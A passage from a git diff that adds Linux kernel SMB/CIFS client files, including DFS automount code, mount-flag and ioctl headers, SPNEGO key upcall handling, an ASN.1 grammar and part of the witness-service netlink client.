++					  struct cifs_sb_info *cifs_sb,
++					  const char *fullpath)
++{
++	struct vfsmount *mnt;
++	char *mountdata;
++	char *devname;
++
++	devname = kstrdup(fullpath, GFP_KERNEL);
++	if (!devname)
++		return ERR_PTR(-ENOMEM);
++
++	convert_delimiter(devname, '/');
++
++	/* TODO: change to call fs_context_for_mount(), fill in context directly, call fc_mount */
++
++	/* See afs_mntpt_do_automount in fs/afs/mntpt.c for an example */
++
++	/* strip first '\' from fullpath */
++	mountdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options,
++					       fullpath + 1, NULL, NULL);
++	if (IS_ERR(mountdata)) {
++		kfree(devname);
++		return (struct vfsmount *)mountdata;
++	}
++
++	mnt = vfs_submount(mntpt, &cifs_fs_type, devname, mountdata);
++	kfree(mountdata);
++	kfree(devname);
++	return mnt;
++}
++
++/*
++ * Create a vfsmount that we can automount
++ */
++static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt)
++{
++	struct cifs_sb_info *cifs_sb;
++	void *page;
++	char *full_path;
++	struct vfsmount *mnt;
++
++	cifs_dbg(FYI, "in %s\n", __func__);
++	BUG_ON(IS_ROOT(mntpt));
++
++	/*
++	 * The MSDFS spec states that paths in DFS referral requests and
++	 * responses must be prefixed by a single '\' character instead of
++	 * the double backslashes usually used in the UNC. This function
++	 * gives us the latter, so we must adjust the result.
++	 */
++	cifs_sb = CIFS_SB(mntpt->d_sb);
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) {
++		mnt = ERR_PTR(-EREMOTE);
++		goto cdda_exit;
++	}
++
++	page = alloc_dentry_path();
++	/* always use tree name prefix */
++	full_path = build_path_from_dentry_optional_prefix(mntpt, page, true);
++	if (IS_ERR(full_path)) {
++		mnt = ERR_CAST(full_path);
++		goto free_full_path;
++	}
++
++	convert_delimiter(full_path, '\\');
++	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
++
++	mnt = cifs_dfs_do_mount(mntpt, cifs_sb, full_path);
++	cifs_dbg(FYI, "%s: cifs_dfs_do_mount:%s , mnt:%p\n", __func__, full_path + 1, mnt);
++
++free_full_path:
++	free_dentry_path(page);
++cdda_exit:
++	cifs_dbg(FYI, "leaving %s\n" , __func__);
++	return mnt;
++}
++
++/*
++ * Attempt to automount the referral
++ */
++struct vfsmount *cifs_dfs_d_automount(struct path *path)
++{
++	struct vfsmount *newmnt;
++
++	cifs_dbg(FYI, "in %s\n", __func__);
++
++	newmnt = cifs_dfs_do_automount(path->dentry);
++	if (IS_ERR(newmnt)) {
++		cifs_dbg(FYI, "leaving %s [automount failed]\n" , __func__);
++		return newmnt;
++	}
++
++	mntget(newmnt); /* prevent immediate expiration */
++	mnt_set_expiry(newmnt, &cifs_dfs_automount_list);
++	schedule_delayed_work(&cifs_dfs_automount_task,
++			      cifs_dfs_mountpoint_expiry_timeout);
++	cifs_dbg(FYI, "leaving %s [ok]\n" , __func__);
++	return newmnt;
++}
++
++const struct inode_operations cifs_dfs_referral_inode_operations = {
++};
+diff --git a/fs/smb/client/cifs_fs_sb.h b/fs/smb/client/cifs_fs_sb.h
+new file mode 100644
+index 0000000000000..013a4bd65280c
+--- /dev/null
++++ b/fs/smb/client/cifs_fs_sb.h
+@@ -0,0 +1,76 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2004
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/rbtree.h>
++
++#ifndef _CIFS_FS_SB_H
++#define _CIFS_FS_SB_H
++
++#include <linux/backing-dev.h>
++
++#define CIFS_MOUNT_NO_PERM      1 /* do not do client vfs_perm check */
++#define CIFS_MOUNT_SET_UID      2 /* set current's euid in create etc. */
++#define CIFS_MOUNT_SERVER_INUM  4 /* inode numbers from uniqueid from server  */
++#define CIFS_MOUNT_DIRECT_IO    8 /* do not write nor read through page cache */
++#define CIFS_MOUNT_NO_XATTR     0x10  /* if set - disable xattr support       */
++#define CIFS_MOUNT_MAP_SPECIAL_CHR 0x20 /* remap illegal chars in filenames   */
++#define CIFS_MOUNT_POSIX_PATHS  0x40  /* Negotiate posix pathnames if possible*/
++#define CIFS_MOUNT_UNX_EMUL     0x80  /* Network compat with SFUnix emulation */
++#define CIFS_MOUNT_NO_BRL       0x100 /* No sending byte range locks to srv   */
++#define CIFS_MOUNT_CIFS_ACL     0x200 /* send ACL requests to non-POSIX srv   */
++#define CIFS_MOUNT_OVERR_UID    0x400 /* override uid returned from server    */
++#define CIFS_MOUNT_OVERR_GID    0x800 /* override gid returned from server    */
++#define CIFS_MOUNT_DYNPERM      0x1000 /* allow in-memory only mode setting   */
++#define CIFS_MOUNT_NOPOSIXBRL   0x2000 /* mandatory not posix byte range lock */
++#define CIFS_MOUNT_NOSSYNC      0x4000 /* don't do slow SMBflush on every sync*/
++#define CIFS_MOUNT_FSCACHE	0x8000 /* local caching enabled */
++#define CIFS_MOUNT_MF_SYMLINKS	0x10000 /* Minshall+French Symlinks enabled */
++#define CIFS_MOUNT_MULTIUSER	0x20000 /* multiuser mount */
++#define CIFS_MOUNT_STRICT_IO	0x40000 /* strict cache mode */
++#define CIFS_MOUNT_RWPIDFORWARD	0x80000 /* use pid forwarding for rw */
++#define CIFS_MOUNT_POSIXACL	0x100000 /* mirror of SB_POSIXACL in mnt_cifs_flags */
++#define CIFS_MOUNT_CIFS_BACKUPUID 0x200000 /* backup intent bit for a user */
++#define CIFS_MOUNT_CIFS_BACKUPGID 0x400000 /* backup intent bit for a group */
++#define CIFS_MOUNT_MAP_SFM_CHR	0x800000 /* SFM/MAC mapping for illegal chars */
++#define CIFS_MOUNT_USE_PREFIX_PATH 0x1000000 /* make subpath with unaccessible
++					      * root mountable
++					      */
++#define CIFS_MOUNT_UID_FROM_ACL 0x2000000 /* try to get UID via special SID */
++#define CIFS_MOUNT_NO_HANDLE_CACHE 0x4000000 /* disable caching dir handles */
++#define CIFS_MOUNT_NO_DFS 0x8000000 /* disable DFS resolving */
++#define CIFS_MOUNT_MODE_FROM_SID 0x10000000 /* retrieve mode from special ACE */
++#define CIFS_MOUNT_RO_CACHE	0x20000000  /* assumes share will not change */
++#define CIFS_MOUNT_RW_CACHE	0x40000000  /* assumes only client accessing */
++#define CIFS_MOUNT_SHUTDOWN	0x80000000
++
++struct cifs_sb_info {
++	struct rb_root tlink_tree;
++	spinlock_t tlink_tree_lock;
++	struct tcon_link *master_tlink;
++	struct nls_table *local_nls;
++	struct smb3_fs_context *ctx;
++	atomic_t active;
++	unsigned int mnt_cifs_flags;
++	struct delayed_work prune_tlinks;
++	struct rcu_head rcu;
++
++	/* only used when CIFS_MOUNT_USE_PREFIX_PATH is set */
++	char *prepath;
++
++	/* randomly generated 128-bit number for indexing dfs mount groups in referral cache */
++	uuid_t dfs_mount_id;
++	/*
++	 * Indicate whether serverino option was turned off later
++	 * (cifs_autodisable_serverino) in order to match new mounts.
++	 */
++	bool mnt_cifs_serverino_autodisabled;
++	/*
++	 * Available once the mount has completed.
++	 */
++	struct dentry *root;
++};
++#endif				/* _CIFS_FS_SB_H */
+diff --git a/fs/smb/client/cifs_ioctl.h b/fs/smb/client/cifs_ioctl.h
+new file mode 100644
+index 0000000000000..d86d78d5bfdc1
+--- /dev/null
++++ b/fs/smb/client/cifs_ioctl.h
+@@ -0,0 +1,126 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Structure definitions for io control for cifs/smb3
++ *
++ *   Copyright (c) 2015 Steve French <steve.french@primarydata.com>
++ *
++ */
++
++struct smb_mnt_fs_info {
++	__u32	version; /* 0001 */
++	__u16	protocol_id;
++	__u16	tcon_flags;
++	__u32	vol_serial_number;
++	__u32	vol_create_time;
++	__u32	share_caps;
++	__u32	share_flags;
++	__u32	sector_flags;
++	__u32	optimal_sector_size;
++	__u32	max_bytes_chunk;
++	__u32	fs_attributes;
++	__u32	max_path_component;
++	__u32	device_type;
++	__u32	device_characteristics;
++	__u32	maximal_access;
++	__u64   cifs_posix_caps;
++} __packed;
++
++struct smb_snapshot_array {
++	__u32	number_of_snapshots;
++	__u32	number_of_snapshots_returned;
++	__u32	snapshot_array_size;
++	/*	snapshots[]; */
++} __packed;
++
++/* query_info flags */
++#define PASSTHRU_QUERY_INFO	0x00000000
++#define PASSTHRU_FSCTL		0x00000001
++#define PASSTHRU_SET_INFO	0x00000002
++struct smb_query_info {
++	__u32   info_type;
++	__u32   file_info_class;
++	__u32   additional_information;
++	__u32   flags;
++	__u32	input_buffer_length;
++	__u32	output_buffer_length;
++	/* char buffer[]; */
++} __packed;
++
++/*
++ * Dumping the commonly used 16 byte (e.g. CCM and GCM128) keys still supported
++ * for backlevel compatibility, but is not sufficient for dumping the less
++ * frequently used GCM256 (32 byte) keys (see the newer "CIFS_DUMP_FULL_KEY"
++ * ioctl for dumping decryption info for GCM256 mounts)
++ */
++struct smb3_key_debug_info {
++	__u64	Suid;
++	__u16	cipher_type;
++	__u8	auth_key[16]; /* SMB2_NTLMV2_SESSKEY_SIZE */
++	__u8	smb3encryptionkey[SMB3_SIGN_KEY_SIZE];
++	__u8	smb3decryptionkey[SMB3_SIGN_KEY_SIZE];
++} __packed;
++
++/*
++ * Dump variable-sized keys
++ */
++struct smb3_full_key_debug_info {
++	/* INPUT: size of userspace buffer */
++	__u32   in_size;
++
++	/*
++	 * INPUT: 0 for current user, otherwise session to dump
++	 * OUTPUT: session id that was dumped
++	 */
++	__u64	session_id;
++	__u16	cipher_type;
++	__u8    session_key_length;
++	__u8    server_in_key_length;
++	__u8    server_out_key_length;
++	__u8    data[];
++	/*
++	 * return this struct with the keys appended at the end:
++	 * __u8 session_key[session_key_length];
++	 * __u8 server_in_key[server_in_key_length];
++	 * __u8 server_out_key[server_out_key_length];
++	 */
++} __packed;
++
++struct smb3_notify {
++	__u32	completion_filter;
++	bool	watch_tree;
++} __packed;
++
++struct smb3_notify_info {
++	__u32	completion_filter;
++	bool	watch_tree;
++	__u32   data_len; /* size of notify data below */
++	__u8	notify_data[];
++} __packed;
++
++#define CIFS_IOCTL_MAGIC	0xCF
++#define CIFS_IOC_COPYCHUNK_FILE	_IOW(CIFS_IOCTL_MAGIC, 3, int)
++#define CIFS_IOC_SET_INTEGRITY  _IO(CIFS_IOCTL_MAGIC, 4)
++#define CIFS_IOC_GET_MNT_INFO _IOR(CIFS_IOCTL_MAGIC, 5, struct smb_mnt_fs_info)
++#define CIFS_ENUMERATE_SNAPSHOTS _IOR(CIFS_IOCTL_MAGIC, 6, struct smb_snapshot_array)
++#define CIFS_QUERY_INFO _IOWR(CIFS_IOCTL_MAGIC, 7, struct smb_query_info)
++#define CIFS_DUMP_KEY _IOWR(CIFS_IOCTL_MAGIC, 8, struct smb3_key_debug_info)
++#define CIFS_IOC_NOTIFY _IOW(CIFS_IOCTL_MAGIC, 9, struct smb3_notify)
++#define CIFS_DUMP_FULL_KEY _IOWR(CIFS_IOCTL_MAGIC, 10, struct smb3_full_key_debug_info)
++#define CIFS_IOC_NOTIFY_INFO _IOWR(CIFS_IOCTL_MAGIC, 11, struct smb3_notify_info)
++#define CIFS_IOC_SHUTDOWN _IOR ('X', 125, __u32)
++
++/*
++ * Flags for going down operation
++ */
++#define CIFS_GOING_FLAGS_DEFAULT                0x0     /* going down */
++#define CIFS_GOING_FLAGS_LOGFLUSH               0x1     /* flush log but not data */
++#define CIFS_GOING_FLAGS_NOLOGFLUSH             0x2     /* don't flush log nor data */
++
++static inline bool cifs_forced_shutdown(struct cifs_sb_info *sbi)
++{
++	if (CIFS_MOUNT_SHUTDOWN & sbi->mnt_cifs_flags)
++		return true;
++	else
++		return false;
++}
+diff --git a/fs/smb/client/cifs_spnego.c b/fs/smb/client/cifs_spnego.c
+new file mode 100644
+index 0000000000000..342717bf1dc28
+--- /dev/null
++++ b/fs/smb/client/cifs_spnego.c
+@@ -0,0 +1,236 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *   SPNEGO upcall management for CIFS
++ *
++ *   Copyright (c) 2007 Red Hat, Inc.
++ *   Author(s): Jeff Layton (jlayton@redhat.com)
++ *
++ */
++
++#include <linux/list.h>
++#include <linux/slab.h>
++#include <linux/string.h>
++#include <keys/user-type.h>
++#include <linux/key-type.h>
++#include <linux/keyctl.h>
++#include <linux/inet.h>
++#include "cifsglob.h"
++#include "cifs_spnego.h"
++#include "cifs_debug.h"
++#include "cifsproto.h"
++static const struct cred *spnego_cred;
++
++/* create a new cifs key */
++static int
++cifs_spnego_key_instantiate(struct key *key, struct key_preparsed_payload *prep)
++{
++	char *payload;
++	int ret;
++
++	ret = -ENOMEM;
++	payload = kmemdup(prep->data, prep->datalen, GFP_KERNEL);
++	if (!payload)
++		goto error;
++
++	/* attach the data */
++	key->payload.data[0] = payload;
++	ret = 0;
++
++error:
++	return ret;
++}
++
++static void
++cifs_spnego_key_destroy(struct key *key)
++{
++	kfree(key->payload.data[0]);
++}
++
++
++/*
++ * keytype for CIFS spnego keys
++ */
++struct key_type cifs_spnego_key_type = {
++	.name		= "cifs.spnego",
++	.instantiate	= cifs_spnego_key_instantiate,
++	.destroy	= cifs_spnego_key_destroy,
++	.describe	= user_describe,
++};
++
++/* length of longest version string e.g.  strlen("ver=0xFF") */
++#define MAX_VER_STR_LEN		8
++
++/* length of longest security mechanism name, eg in future could have
++ * strlen(";sec=ntlmsspi") */
++#define MAX_MECH_STR_LEN	13
++
++/* strlen of "host=" */
++#define HOST_KEY_LEN		5
++
++/* strlen of ";ip4=" or ";ip6=" */
++#define IP_KEY_LEN		5
++
++/* strlen of ";uid=0x" */
++#define UID_KEY_LEN		7
++
++/* strlen of ";creduid=0x" */
++#define CREDUID_KEY_LEN		11
++
++/* strlen of ";user=" */
++#define USER_KEY_LEN		6
++
++/* strlen of ";pid=0x" */
++#define PID_KEY_LEN		7
++
++/* get a key struct with a SPNEGO security blob, suitable for session setup */
++struct key *
++cifs_get_spnego_key(struct cifs_ses *sesInfo,
++		    struct TCP_Server_Info *server)
++{
++	struct sockaddr_in *sa = (struct sockaddr_in *) &server->dstaddr;
++	struct sockaddr_in6 *sa6 = (struct sockaddr_in6 *) &server->dstaddr;
++	char *description, *dp;
++	size_t desc_len;
++	struct key *spnego_key;
++	const char *hostname = server->hostname;
++	const struct cred *saved_cred;
++
++	/* length of fields (with semicolons): ver=0xyz ip4=ipaddress
++	   host=hostname sec=mechanism uid=0xFF user=username */
++	desc_len = MAX_VER_STR_LEN +
++		   HOST_KEY_LEN + strlen(hostname) +
++		   IP_KEY_LEN + INET6_ADDRSTRLEN +
++		   MAX_MECH_STR_LEN +
++		   UID_KEY_LEN + (sizeof(uid_t) * 2) +
++		   CREDUID_KEY_LEN + (sizeof(uid_t) * 2) +
++		   PID_KEY_LEN + (sizeof(pid_t) * 2) + 1;
++
++	if (sesInfo->user_name)
++		desc_len += USER_KEY_LEN + strlen(sesInfo->user_name);
++
++	spnego_key = ERR_PTR(-ENOMEM);
++	description = kzalloc(desc_len, GFP_KERNEL);
++	if (description == NULL)
++		goto out;
++
++	dp = description;
++	/* start with version and hostname portion of UNC string */
++	spnego_key = ERR_PTR(-EINVAL);
++	sprintf(dp, "ver=0x%x;host=%s;", CIFS_SPNEGO_UPCALL_VERSION,
++		hostname);
++	dp = description + strlen(description);
++
++	/* add the server address */
++	if (server->dstaddr.ss_family == AF_INET)
++		sprintf(dp, "ip4=%pI4", &sa->sin_addr);
++	else if (server->dstaddr.ss_family == AF_INET6)
++		sprintf(dp, "ip6=%pI6", &sa6->sin6_addr);
++	else
++		goto out;
++
++	dp = description + strlen(description);
++
++	/* for now, only sec=krb5 and sec=mskrb5 are valid */
++	if (server->sec_kerberos)
++		sprintf(dp, ";sec=krb5");
++	else if (server->sec_mskerberos)
++		sprintf(dp, ";sec=mskrb5");
++	else {
++		cifs_dbg(VFS, "unknown or missing server auth type, use krb5\n");
++		sprintf(dp, ";sec=krb5");
++	}
++
++	dp = description + strlen(description);
++	sprintf(dp, ";uid=0x%x",
++		from_kuid_munged(&init_user_ns, sesInfo->linux_uid));
++
++	dp = description + strlen(description);
++	sprintf(dp, ";creduid=0x%x",
++		from_kuid_munged(&init_user_ns, sesInfo->cred_uid));
++
++	if (sesInfo->user_name) {
++		dp = description + strlen(description);
++		sprintf(dp, ";user=%s", sesInfo->user_name);
++	}
++
++	dp = description + strlen(description);
++	sprintf(dp, ";pid=0x%x", current->pid);
++
++	cifs_dbg(FYI, "key description = %s\n", description);
++	saved_cred = override_creds(spnego_cred);
++	spnego_key = request_key(&cifs_spnego_key_type, description, "");
++	revert_creds(saved_cred);
++
++#ifdef CONFIG_CIFS_DEBUG2
++	if (cifsFYI && !IS_ERR(spnego_key)) {
++		struct cifs_spnego_msg *msg = spnego_key->payload.data[0];
++		cifs_dump_mem("SPNEGO reply blob:", msg->data, min(1024U,
++				msg->secblob_len + msg->sesskey_len));
++	}
++#endif /* CONFIG_CIFS_DEBUG2 */
++
++out:
++	kfree(description);
++	return spnego_key;
++}
++
++int
++init_cifs_spnego(void)
++{
++	struct cred *cred;
++	struct key *keyring;
++	int ret;
++
++	cifs_dbg(FYI, "Registering the %s key type\n",
++		 cifs_spnego_key_type.name);
++
++	/*
++	 * Create an override credential set with special thread keyring for
++	 * spnego upcalls.
++	 */
++
++	cred = prepare_kernel_cred(NULL);
++	if (!cred)
++		return -ENOMEM;
++
++	keyring = keyring_alloc(".cifs_spnego",
++				GLOBAL_ROOT_UID, GLOBAL_ROOT_GID, cred,
++				(KEY_POS_ALL & ~KEY_POS_SETATTR) |
++				KEY_USR_VIEW | KEY_USR_READ,
++				KEY_ALLOC_NOT_IN_QUOTA, NULL, NULL);
++	if (IS_ERR(keyring)) {
++		ret = PTR_ERR(keyring);
++		goto failed_put_cred;
++	}
++
++	ret = register_key_type(&cifs_spnego_key_type);
++	if (ret < 0)
++		goto failed_put_key;
++
++	/*
++	 * instruct request_key() to use this special keyring as a cache for
++	 * the results it looks up
++	 */
++	set_bit(KEY_FLAG_ROOT_CAN_CLEAR, &keyring->flags);
++	cred->thread_keyring = keyring;
++	cred->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
++	spnego_cred = cred;
++
++	cifs_dbg(FYI, "cifs spnego keyring: %d\n", key_serial(keyring));
++	return 0;
++
++failed_put_key:
++	key_put(keyring);
++failed_put_cred:
++	put_cred(cred);
++	return ret;
++}
++
++void
++exit_cifs_spnego(void)
++{
++	key_revoke(spnego_cred->thread_keyring);
++	unregister_key_type(&cifs_spnego_key_type);
++	put_cred(spnego_cred);
++	cifs_dbg(FYI, "Unregistered %s key type\n", cifs_spnego_key_type.name);
++}
+diff --git a/fs/smb/client/cifs_spnego.h b/fs/smb/client/cifs_spnego.h
+new file mode 100644
+index 0000000000000..7f102ffeb6750
+--- /dev/null
++++ b/fs/smb/client/cifs_spnego.h
+@@ -0,0 +1,36 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *   SPNEGO upcall management for CIFS
++ *
++ *   Copyright (c) 2007 Red Hat, Inc.
++ *   Author(s): Jeff Layton (jlayton@redhat.com)
++ *              Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#ifndef _CIFS_SPNEGO_H
++#define _CIFS_SPNEGO_H
++
++#define CIFS_SPNEGO_UPCALL_VERSION 2
++
++/*
++ * The version field should always be set to CIFS_SPNEGO_UPCALL_VERSION.
++ * The flags field is for future use. The request-key callout should set
++ * sesskey_len and secblob_len, and then concatenate the SessKey+SecBlob
++ * and stuff it in the data field.
++ */
++struct cifs_spnego_msg {
++	uint32_t	version;
++	uint32_t	flags;
++	uint32_t	sesskey_len;
++	uint32_t	secblob_len;
++	uint8_t		data[1];
++};
++
++#ifdef __KERNEL__
++extern struct key_type cifs_spnego_key_type;
++extern struct key *cifs_get_spnego_key(struct cifs_ses *sesInfo,
++				       struct TCP_Server_Info *server);
++#endif /* KERNEL */
++
++#endif /* _CIFS_SPNEGO_H */
+diff --git a/fs/smb/client/cifs_spnego_negtokeninit.asn1 b/fs/smb/client/cifs_spnego_negtokeninit.asn1
+new file mode 100644
+index 0000000000000..181c083887d51
+--- /dev/null
++++ b/fs/smb/client/cifs_spnego_negtokeninit.asn1
+@@ -0,0 +1,40 @@
++GSSAPI ::=
++	[APPLICATION 0] IMPLICIT SEQUENCE {
++		thisMech
++			OBJECT IDENTIFIER ({cifs_gssapi_this_mech}),
++		negotiationToken
++			NegotiationToken
++	}
++
++MechType ::= OBJECT IDENTIFIER ({cifs_neg_token_init_mech_type})
++
++MechTypeList ::= SEQUENCE OF MechType
++
++NegHints ::= SEQUENCE {
++	hintName
++		[0] GeneralString OPTIONAL,
++	hintAddress
++		[1] OCTET STRING OPTIONAL
++	}
++
++NegTokenInit2 ::=
++	SEQUENCE {
++		mechTypes
++			[0] MechTypeList OPTIONAL,
++		reqFlags
++			[1] BIT STRING OPTIONAL,
++		mechToken
++			[2] OCTET STRING OPTIONAL,
++		negHints
++			[3] NegHints OPTIONAL,
++		mechListMIC
++			[3] OCTET STRING OPTIONAL
++	}
++
++NegotiationToken ::=
++	CHOICE {
++		negTokenInit
++			[0] NegTokenInit2,
++		negTokenTarg
++			[1] ANY
++	}
+diff --git a/fs/smb/client/cifs_swn.c b/fs/smb/client/cifs_swn.c
+new file mode 100644
+index 0000000000000..7233c6a7e6d70
+--- /dev/null
++++ b/fs/smb/client/cifs_swn.c
+@@ -0,0 +1,674 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Witness Service client for CIFS
++ *
++ * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
++ */
++
++#include <linux/kref.h>
++#include <net/genetlink.h>
++#include <uapi/linux/cifs/cifs_netlink.h>
++
++#include "cifs_swn.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "fscache.h"
++#include "cifs_debug.h"
++#include "netlink.h"
++
++static DEFINE_IDR(cifs_swnreg_idr);
++static DEFINE_MUTEX(cifs_swnreg_idr_mutex);
++
++struct cifs_swn_reg {
++	int id;
++	struct kref ref_count;
++
++	const char *net_name;
++	const char *share_name;
++	bool net_name_notify;
++	bool share_name_notify;
++	bool ip_notify;
++
++	struct cifs_tcon *tcon;
++};
++
++static int cifs_swn_auth_info_krb(struct cifs_tcon *tcon, struct sk_buff *skb)
++{
++	int ret;
++
++	ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_KRB_AUTH);
++	if (ret < 0)
++		return ret;
++
++	return 0;
++}
++
++static int cifs_swn_auth_info_ntlm(struct cifs_tcon *tcon, struct sk_buff *skb)
++{
++	int ret;
++
++	if (tcon->ses->user_name != NULL) {
++		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_USER_NAME, tcon->ses->user_name);
++		if (ret < 0)
++			return ret;
++	}
++
++	if (tcon->ses->password != NULL) {
++		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_PASSWORD, tcon->ses->password);
++		if (ret < 0)
++			return ret;
++	}
++
++	if (tcon->ses->domainName != NULL) {
++		ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_DOMAIN_NAME, tcon->ses->domainName);
++		if (ret < 0)
++			return ret;
++	}
++
++	return 0;
++}
++
++/*
++ * Sends a register message to the userspace daemon based on the registration.
++ * The authentication information to connect to the witness service is bundled
++ * into the message.
++ */
++static int cifs_swn_send_register_message(struct cifs_swn_reg *swnreg)
++{
++	struct sk_buff *skb;
++	struct genlmsghdr *hdr;
++	enum securityEnum authtype;
++	struct sockaddr_storage *addr;
++	int ret;
++
++	skb = genlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (skb == NULL) {
++		ret = -ENOMEM;
++		goto fail;
++	}
++
++	hdr = genlmsg_put(skb, 0, 0, &cifs_genl_family, 0, CIFS_GENL_CMD_SWN_REGISTER);
++	if (hdr == NULL) {
++		ret = -ENOMEM;
++		goto nlmsg_fail;
++	}
++
++	ret = nla_put_u32(skb, CIFS_GENL_ATTR_SWN_REGISTRATION_ID, swnreg->id);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_NET_NAME, swnreg->net_name);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME, swnreg->share_name);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	/*
++	 * If there is an address stored use it instead of the server address, because we are
++	 * in the process of reconnecting to it after a share has been moved or we have been
++	 * told to switch to it (client move message). In these cases we unregister from the
++	 * server address and register to the new address when we receive the notification.
++	 */
++	if (swnreg->tcon->ses->server->use_swn_dstaddr)
++		addr = &swnreg->tcon->ses->server->swn_dstaddr;
++	else
++		addr = &swnreg->tcon->ses->server->dstaddr;
++
++	ret = nla_put(skb, CIFS_GENL_ATTR_SWN_IP, sizeof(struct sockaddr_storage), addr);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	if (swnreg->net_name_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	if (swnreg->share_name_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	if (swnreg->ip_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_IP_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	authtype = cifs_select_sectype(swnreg->tcon->ses->server, swnreg->tcon->ses->sectype);
++	switch (authtype) {
++	case Kerberos:
++		ret = cifs_swn_auth_info_krb(swnreg->tcon, skb);
++		if (ret < 0) {
++			cifs_dbg(VFS, "%s: Failed to get kerberos auth info: %d\n", __func__, ret);
++			goto nlmsg_fail;
++		}
++		break;
++	case NTLMv2:
++	case RawNTLMSSP:
++		ret = cifs_swn_auth_info_ntlm(swnreg->tcon, skb);
++		if (ret < 0) {
++			cifs_dbg(VFS, "%s: Failed to get NTLM auth info: %d\n", __func__, ret);
++			goto nlmsg_fail;
++		}
++		break;
++	default:
++		cifs_dbg(VFS, "%s: secType %d not supported!\n", __func__, authtype);
++		ret = -EINVAL;
++		goto nlmsg_fail;
++	}
++
++	genlmsg_end(skb, hdr);
++	genlmsg_multicast(&cifs_genl_family, skb, 0, CIFS_GENL_MCGRP_SWN, GFP_ATOMIC);
++
++	cifs_dbg(FYI, "%s: Message to register for network name %s with id %d sent\n", __func__,
++			swnreg->net_name, swnreg->id);
++
++	return 0;
++
++nlmsg_fail:
++	genlmsg_cancel(skb, hdr);
++	nlmsg_free(skb);
++fail:
++	return ret;
++}
++
++/*
++ * Sends an uregister message to the userspace daemon based on the registration
++ */
++static int cifs_swn_send_unregister_message(struct cifs_swn_reg *swnreg)
++{
++	struct sk_buff *skb;
++	struct genlmsghdr *hdr;
++	int ret;
++
++	skb = genlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (skb == NULL)
++		return -ENOMEM;
++
++	hdr = genlmsg_put(skb, 0, 0, &cifs_genl_family, 0, CIFS_GENL_CMD_SWN_UNREGISTER);
++	if (hdr == NULL) {
++		ret = -ENOMEM;
++		goto nlmsg_fail;
++	}
++
++	ret = nla_put_u32(skb, CIFS_GENL_ATTR_SWN_REGISTRATION_ID, swnreg->id);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_NET_NAME, swnreg->net_name);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put_string(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME, swnreg->share_name);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	ret = nla_put(skb, CIFS_GENL_ATTR_SWN_IP, sizeof(struct sockaddr_storage),
++			&swnreg->tcon->ses->server->dstaddr);
++	if (ret < 0)
++		goto nlmsg_fail;
++
++	if (swnreg->net_name_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	if (swnreg->share_name_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	if (swnreg->ip_notify) {
++		ret = nla_put_flag(skb, CIFS_GENL_ATTR_SWN_IP_NOTIFY);
++		if (ret < 0)
++			goto nlmsg_fail;
++	}
++
++	genlmsg_end(skb, hdr);
++	genlmsg_multicast(&cifs_genl_family, skb, 0, CIFS_GENL_MCGRP_SWN, GFP_ATOMIC);
++
++	cifs_dbg(FYI, "%s: Message to unregister for network name %s with id %d sent\n", __func__,
++			swnreg->net_name, swnreg->id);
++
++	return 0;
++
++nlmsg_fail:
++	genlmsg_cancel(skb, hdr);
++	nlmsg_free(skb);
++	return ret;
++}
++
++/*
++ * Try to find a matching registration for the tcon's server name and share name.
++ * Calls to this function must be protected by cifs_swnreg_idr_mutex.
++ * TODO Try to avoid memory allocations
++ */
++static struct cifs_swn_reg *cifs_find_swn_reg(struct cifs_tcon *tcon)
++{
++	struct cifs_swn_reg *swnreg;
++	int id;
++	const char *share_name;
++	const char *net_name;
++
++	net_name = extract_hostname(tcon->tree_name);
++	if (IS_ERR(net_name)) {
++		int ret;
++
++		ret = PTR_ERR(net_name);
++		cifs_dbg(VFS, "%s: failed to extract host name from target '%s': %d\n",
++				__func__, tcon->tree_name, ret);
++		return ERR_PTR(-EINVAL);
++	}
++
++	share_name = extract_sharename(tcon->tree_name);
++	if (IS_ERR(share_name)) {
++		int ret;
++
